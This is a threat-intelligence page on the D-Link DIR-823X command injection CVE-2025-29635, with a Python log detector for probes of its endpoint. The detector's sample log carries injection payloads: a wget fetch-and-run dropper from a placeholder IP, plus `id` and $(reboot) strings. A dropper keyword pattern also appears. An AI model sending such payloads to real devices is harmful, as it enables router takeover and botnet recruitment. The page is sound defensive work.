🔴 CVE-2025-29635

Command injection vulnerability in D-Link DIR-823X routers allows authorized attackers to execute arbitrary commands via POST request to /goform/set_prohibiting. This vulnerability is actively exploited in Mirai botnet campaigns and is listed on CISA KEV.

Risk Level: HIGH_RISK
CVSS Score: 7.2
Attack Vector: NETWORK
ATT&CK Tactic: Initial Access
ATT&CK Technique: T1190 — Exploit Public-Facing Application
Deployment Risk: VERY_HIGH
Ransomware: No

📋 Vulnerability Details

Data Source: CIRCL

Confidence: HIGH

Exploitation Method: DIRECT_NETWORK

CVE Published: 2025-03-25

Added to CISA KEV: 2026-04-24 (395 days between CVE publication and KEV listing)

🎯 Recommendations:

🔍 Web Intelligence (Kagi · 2026-06-04)

CVE-2025-29635 is a high-severity (CVSS 7.2) command injection vulnerability affecting D-Link DIR-823X series routers [1].

Active Exploitation and Threat Actor Usage
  • Active Exploitation: The vulnerability has been actively exploited in the wild [1].
  • Threat Actor Usage: It has been specifically targeted by Mirai botnet campaigns, which leverage the vulnerability to compromise devices and incorporate them into their botnet infrastructure [1].
Attack Method and Requirements
  • Method: The vulnerability is a command injection flaw triggered by sending a specially crafted `POST` request to the `/goform/set_prohibiting` endpoint [2].
  • Requirements:
    * Network Access: It is a remote vulnerability, meaning it can be exploited over the network [2].
    * User Interaction: No user interaction is required for successful exploitation [5].
    * Authentication: NVD describes the attacker as "authorized" [2], and the CVSS score of 7.2 is consistent with a high privilege requirement rather than unauthenticated access. The sources cited here do not say how the Mirai campaigns satisfy that requirement, so the login step should not be relied on as a mitigation; the safe assumption is that any DIR-823X whose management interface is reachable from an untrusted network is exposed.
Impact
  • Access/Impact: Successful exploitation grants an attacker the ability to execute arbitrary shell commands on the target device [3]. This results in full control over system processes and data, leading to a total loss of confidentiality, integrity, and availability for the device [3].
  • Campaign Type: It is primarily associated with botnet recruitment (Mirai) rather than ransomware or targeted espionage campaigns [1].
Proof-of-Concept (PoC) Availability
  • Publicly available exploit code or PoC details have been observed and are being leveraged by attackers to scan for and compromise vulnerable devices [1].
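As an added detection example for the attack method and the scanning activity described above (this is not code from the page's sources, from D-Link, or from Akamai, and it is not an exploit): the script below flags POST requests to /goform/set_prohibiting whose form fields carry shell metacharacters, and ranks higher the ones that also contain fetch-and-run fragments typical of botnet droppers. The page does not name the form field that reaches the shell, so the field name `mac`, the log format, the dropper URL and every sample line are constructed for the example; the detector keys on the endpoint plus metacharacters in any field rather than on a specific parameter. A request that was rejected with 401 is still reported, because a failed probe is the scanning signal a defender wants.

```python
"""Flag probes of the D-Link DIR-823X /goform/set_prohibiting endpoint in HTTP logs.

Added example for this page, not D-Link's code and not an exploit. The page does not
name the form field that reaches the shell, so the detector keys on the endpoint plus
shell metacharacters in any field. The log format and every sample line below are
constructed for the example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

TARGET_PATH = "/goform/set_prohibiting"

# Characters that end the intended command and start another when a value is
# spliced into a shell command line unsanitised (the CWE-77 pattern on this page).
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Fetch-and-run fragments typical of IoT botnet droppers; used only to rank findings.
DROPPER_HINTS = re.compile(r"wget|curl|tftp|busybox|chmod|/tmp/", re.IGNORECASE)

# Constructed log format: <src ip> "<method> <path> HTTP/x.y" <status> body="<raw body>"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) body="(?P<body>.*)"$'
)


@dataclass
class Finding:
    src_ip: str
    status: int
    field: str
    reason: str
    value: str


def parse_form(raw: str) -> list[tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body into (name, value) pairs.

    Done by hand so that ';' inside a value survives: older parse_qsl() treated ';'
    as a pair separator, and ';' is exactly the character an injection relies on.
    """
    pairs = []
    for field in raw.split("&"):
        if field:
            name, _, value = field.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(value: str) -> str | None:
    """Return a reason string if the value looks like a shell injection, else None."""
    if not SHELL_META.search(value):
        return None  # ordinary administration also POSTs to this endpoint
    if DROPPER_HINTS.search(value):
        return "command injection with dropper fetch"
    return "shell metacharacters in form field"


def scan_lines(lines: list[str]) -> list[Finding]:
    """Run the detector over log lines; a 401/403 on an injection attempt is still a probe."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != TARGET_PATH:
            continue
        for name, value in parse_form(m["body"]):
            reason = classify_value(value)
            if reason:
                findings.append(Finding(m["ip"], int(m["status"]), name, reason, value))
    return findings


# Constructed sample traffic (RFC 5737 documentation addresses, made-up field names).
SAMPLE_LOG = [
    '192.0.2.10 "GET /index.html HTTP/1.1" 200 body=""',
    '192.0.2.10 "POST /goform/set_prohibiting HTTP/1.1" 200 body="mac=00:11:22:33:44:55&enable=1"',
    '198.51.100.7 "POST /goform/set_prohibiting HTTP/1.1" 200 '
    'body="mac=00:11:22:33:44:55;wget+http://203.0.113.5/x.sh+-O+/tmp/x;chmod+777+/tmp/x;/tmp/x&enable=1"',
    '198.51.100.8 "POST /goform/set_prohibiting HTTP/1.1" 200 body="mac=00:11:22:33:44:55%60id%60&enable=1"',
    '203.0.113.9 "POST /goform/set_prohibiting HTTP/1.1" 401 body="mac=1%3B%24%28reboot%29"',
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"{f.src_ip} status={f.status} field={f.field}: {f.reason} -> {f.value!r}")
```

Run against real traffic, the line regex is the only part that needs adapting to the proxy or WAF log format in use; the second sample line shows why the form body is parsed field by field rather than grepped as a whole, since the `&` that separates fields is itself a shell metacharacter and would otherwise flag every legitimate configuration change.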
Affected Versions and Mitigation
  • Affected Products: D-Link DIR-823X series routers running firmware versions 240126 and 240802 (sometimes cited as 24082) [2] [1].
  • Status: These devices were declared retired by the vendor as of September 2025 [1]. Because they are end-of-life, users are strongly advised to replace these devices, as they are no longer receiving security updates [4].

Sources

  1. CVE-2025-29635: Mirai Campaign Targets D-Link Devices - Akamai

    Read about the active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 discovered by the Akamai SIRT. ... CVE-2025-29635, which was publicly disclosed in late March 2025, is a command injection vulnerability in D-Link DIR-823X series routers that affects firmware ve…

  2. NVD - CVE-2025-29635

    CVE-2025-29635 Detail Description A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execut…

  3. CVE-2025-29635 - Vulnerability Details - OpenCVE

    This action injects arbitrary shell commands, granting the attacker full control over system processes and data. The weakness aligns with CWE-77, indicating that unsanitized command execution is possible. The impact is a loss of confidentiality, integrity, and availability for the affected device.

  4. Command Injection in Vivotek Legacy Firmware: What You... | Akamai

    This vulnerability highlights the critical security risks in IoT devices. Organizations with affected cameras should prioritize patches, and users should be informed about risks to take protective measures.Read about the active exploitation attempts of the D-Link command injection vulnerability CVE-…

  5. A command injection vulnerability in D-Link...

    Affected versions.Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability. Attack complexity: More severe for the least complex attacks. Privileges required: More severe if no privileges are required. User interaction: More s…